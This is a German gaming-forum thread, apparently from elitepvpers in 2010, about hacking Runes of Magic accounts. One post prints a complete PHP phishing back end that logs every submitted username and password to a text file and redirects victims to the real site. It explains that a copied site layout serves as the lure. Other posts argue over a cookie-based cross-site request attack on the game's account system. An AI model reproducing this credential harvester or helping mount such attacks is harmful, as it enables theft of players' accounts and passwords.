|
You last visited: Today at 19:02
Advertisement
ROM Account hacken
Discussion on ROM Account hacken within the General Gaming Discussion forum part of the General Gaming category.
06/25/2010, 15:08
|
#16
|
elite*gold: 81
Join Date: Jul 2005
Posts: 1,921
Received Thanks: 2,239
|
Quote:
Originally Posted by Fir3andIc3
Du fragst also den Server nach einem Benutzername und er gibt dir das PW??
|
Nein, Ich gebe alle Informationen an, so wie ich sie haben möchte.
Es wird ledeglich das Cookie von jemand gebraucht was bei Browsern automatisch zugeordnet wird bei einem Request.
|
|
|
06/25/2010, 15:12
|
#17
|
elite*gold: 0
Join Date: Jun 2010
Posts: 31
Received Thanks: 2
|
aber die cookies werden doch auf dem rechner , des jeweiligen gespeichert und nicht auf dem browser , oder nicht?
|
|
|
06/25/2010, 15:13
|
#18
|
elite*gold: 6
Join Date: Dec 2007
Posts: 249
Received Thanks: 205
|
Das ist doch ein einfacher Phishing-Versuch. Nichts spezielles mit Cookies abfangen oder so
Hier der Inhalt der post.php
PHP Code:
<?php header ('Location: http://www.runesofmagic.com'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Der Quelltext der Runes of Magic Seite dient doch nur als Layout-Template um das Opfer glauben zu lassen es handele sich dabei um die echte Runes of Magic Seite.
Der ganze Spaß bzw. die Texteingaben wie Benutzername und Passwort werden über die globale Variable $_POST abgefangen und in die Datei usernames.txt geschrieben. Fertig.
Das Opfer brauch dabei doch nur den Link der "offiziellen Runes of Magic Seite" (Phishing-Page) bekommen und seine Eingaben machen.
|
|
|
06/25/2010, 15:16
|
#19
|
elite*gold: 81
Join Date: Jul 2005
Posts: 1,921
Received Thanks: 2,239
|
Quote:
Originally Posted by wolleboiii
aber die cookies werden doch auf dem rechner , des jeweiligen gespeichert und nicht auf dem browser , oder nicht?
|
Erm ja, deswegen hab ich ja gesagt, dass das Opfer im Accountsystem von Yusho eingeloggt sein muss, bzw hat sich morgens kurz eingeloggt um Dias zu kaufen. Das Fenster muss auch nicht offen sein, solange er den Browser in dieser Zeit nicht neustartet, dann wäre er anfällig für sowas da der Frogster Server keinen Unterschied macht ob ein Request von runesofmagic.com kommt oder von elitepvpers.com oder sonst wo.
|
|
|
06/25/2010, 15:21
|
#20
|
elite*gold: 50
Join Date: Dec 2007
Posts: 598
Received Thanks: 81
|
Quote:
Originally Posted by Atheuz
Nein, Ich gebe alle Informationen an, so wie ich sie haben möchte.
Es wird ledeglich das Cookie von jemand gebraucht was bei Browsern automatisch zugeordnet wird bei einem Request.
|
Also das ergibt für mich absolut keinen Sinn! Ich brauche doch nen Cookie von einem "Opfer" und nicht meinen eignen mit den Daten welche ich mir ausgedacht habe öÖ
|
|
|
06/25/2010, 15:22
|
#21
|
elite*gold: 81
Join Date: Jul 2005
Posts: 1,921
Received Thanks: 2,239
|
Quote:
Originally Posted by Fir3andIc3
Also das ergibt für mich absolut keinen Sinn! Ich brauche doch nen Cookie von einem "Opfer" und nicht meinen eignen mit den Daten welche ich mir ausgedacht habe öÖ
|
Gib mir einfach deine MSN damit wir den Spuk von Unwissenheit hier mal endlich lüften können.
|
|
|
06/25/2010, 15:24
|
#22
|
elite*gold: 50
Join Date: Dec 2007
Posts: 598
Received Thanks: 81
|
Quote:
Originally Posted by Atheuz
Erm ja, deswegen hab ich ja gesagt, dass das Opfer im Accountsystem von Yusho eingeloggt sein muss, bzw hat sich morgens kurz eingeloggt um Dias zu kaufen. Das Fenster muss auch nicht offen sein, solange er den Browser in dieser Zeit nicht neustartet, dann wäre er anfällig für sowas da der Frogster Server keinen Unterschied macht ob ein Request von runesofmagic.com kommt oder von elitepvpers.com oder sonst wo.
|
LOl? Ich denke schon das die IP des Servers Richtig eingetragen ist Der Server muß doch irgenwei wissen welcher account dias bestellt hat und diesem dann Dias zuordnen! Das geht wohl schlecht mit einem Fake Server.
Quote:
Originally Posted by Atheuz
Gib mir einfach deine MSN damit wir den Spuk von Unwissenheit hier mal endlich lüften können.
|
Brauche ich nicht da ich mir zu 1000% sicher bin, dass es nichts anderes als PHISHING ist Wie Shadow schon sagte. Das geht aber nur wenn der Server von Yasho Daten an einen Anderen Server sendet. Un das geht nur in der Server/Domain einstellung selbst und nicht über Cookies....
|
|
|
06/25/2010, 15:27
|
#23
|
elite*gold: 81
Join Date: Jul 2005
Posts: 1,921
Received Thanks: 2,239
|
Quote:
Originally Posted by Fir3andIc3
LOl? Ich denke schon das die IP des Servers Richtig eingetragen ist Der Server muß doch irgenwei wissen welcher account dias bestellt hat und diesem dann Dias zuordnen! Das geht wohl schlecht mit einem Fake Server.
|
Wie oft noch, -das ist kein fakeserver- oder sonst was. Es wird ledeglich ein Request verschickt, der Browser ordnet das selber zu. Ich biete hier dir ein Beweis an und du trollst einfach weiter
|
|
|
06/25/2010, 15:27
|
#24
|
elite*gold: 0
Join Date: Jun 2010
Posts: 31
Received Thanks: 2
|
ich glaube Atheuz meint das man sich quasi den cookie schicken lässt.
man erstellt per ( html?! .. ka) eine webanfrage inklusive cookie anforderung? könnte ich mir jedenfalls so vorstellen.. nur da kommt mir dann die nächste frage, wie man eine solche erstellt
|
|
|
06/25/2010, 15:29
|
#25
|
elite*gold: 81
Join Date: Jul 2005
Posts: 1,921
Received Thanks: 2,239
|
Quote:
Originally Posted by wolleboiii
ich glaube Atheuz meint das man sich quasi den cookie schicken lässt.
man erstellt per ( html?! .. ka) eine webanfrage inklusive cookie anforderung? könnte ich mir jedenfalls so vorstellen.. nur da kommt mir dann die nächste frage, wie man eine solche erstellt
|
Gibt mir einfach von irgendjemand eine MSN, damit ichs beweisen kann -.-
|
|
|
06/25/2010, 15:31
|
#26
|
elite*gold: 0
Join Date: Jun 2010
Posts: 31
Received Thanks: 2
|
ist aber nicht meine... oder brauchst du eine von uns?
|
|
|
06/25/2010, 15:31
|
#27
|
elite*gold: 50
Join Date: Dec 2007
Posts: 598
Received Thanks: 81
|
Quote:
Originally Posted by wolleboiii
ich glaube Atheuz meint das man sich quasi den cookie schicken lässt.
man erstellt per ( html?! .. ka) eine webanfrage inklusive cookie anforderung? könnte ich mir jedenfalls so vorstellen.. nur da kommt mir dann die nächste frage, wie man eine solche erstellt
|
Sobald du versuchst dich irgenwo einzuloggen erstellst du automatisch einen cookie. Da kannst du genau so gut ne bruteforce starten und warten.
Wenn so geht wie er sagt, dann soll er mir bitte mal ein paar funktionierend daten senden und ich versuche mich da mal einzuloggen.. von mir aus meine ^^
|
|
|
06/25/2010, 15:33
|
#28
|
elite*gold: 81
Join Date: Jul 2005
Posts: 1,921
Received Thanks: 2,239
|
Quote:
Originally Posted by wolleboiii
ist aber nicht meine... oder brauchst du eine von uns?
|
Kewl trolls, ich brauch schon eine von euch damit man auch sich mit euch unterhalten kann. Das ist ja auch der Sinn dabei und nicht das ich euch jetzt Accounts hacke, ihr versteht das nichtmal.
|
|
|
06/25/2010, 15:35
|
#29
|
elite*gold: 0
Join Date: Jun 2010
Posts: 31
Received Thanks: 2
|
relaxe atheuz...
hast ne pm
|
|
|
06/25/2010, 16:44
|
#30
|
elite*gold: 81
Join Date: Jul 2005
Posts: 1,921
Received Thanks: 2,239
|
Quote:
Originally Posted by Fir3andIc3
Brauche ich nicht da ich mir zu 1000% sicher bin, dass es nichts anderes als PHISHING ist Wie Shadow schon sagte. Das geht aber nur wenn der Server von Yasho Daten an einen Anderen Server sendet. Un das geht nur in der Server/Domain einstellung selbst und nicht über Cookies....
|
Leider warst du dir nicht zu 1001% sicher, hatte es wolleboii auch nun genauer erklärt wieso das überhaupt geht.
Wo bleibt mein obligatorischer Kuchen?
|
|
|
|
|
Similar Threads
|
Account hacken?
03/03/2010 - Last Chaos - 5 Replies
Hi, ich wollte ma fragn ob ma nen Account hacken kann mit irgend nem Programm, wenn man den Benutzernamen weis (damit das Ding das PW hackt).
Geht das?
|
account hacken
07/29/2009 - Metin2 - 8 Replies
hab ne frage vor kurzem hat mein freund mir ziemlich viele sachen von meinem acc geklaut weil er mein pw wusste.ich will mir die sachen jetzt auch wieder zurückholen und kann ich das?
ich weiß seine id und er hat sich auch mal bei mir auf dem pc in metin2 eingeloggt(weiß net ob das was bringt aber vllt)
könnt ihr mir helfen?
|
account hacken
04/16/2008 - World of Warcraft - 11 Replies
Hi hab eben auf einer hacker seite gelesen das die eine sicherheitslücke gefunden haben womit man blizzards automailer austrickst um an die account daten von einer anderen person zu kommen und die kommentare waren alle gut weiß einer ob das geht?
also da stand drin das man eine email mit dem inhalt :
<Useaccretrive>
<hier ihr account name eingeben>
<hier ihr Passwort eingeben>
<Hier Charaktername des opfers eingeben>
<Hier den realmnamen des opfers eingeben>...
|
account hacken?
10/16/2007 - Cabal Online - 19 Replies
Wie kann ich na eigentlicj ne Account hacken???
Hab gute Gründe!
Wäre nice wenn mir da jemand was sagen kann.
Schon mal danke.
|
Account hacken
06/09/2007 - Kal Online - 11 Replies
Hi,
Wie einfach ist es eigentlich nen Account zu hacken/cleanen ?
Wurde neulich angeschrieben kp warum das ich bald gehackt werd...
ich glaub da nich so dran, also bin eigentlich nich leichtgläubig...aber bissl schiss hab ich jetzt schon ^^
bin immerhin lvl53 :X
pls help
|
All times are GMT +2. The time now is 19:02.
|
|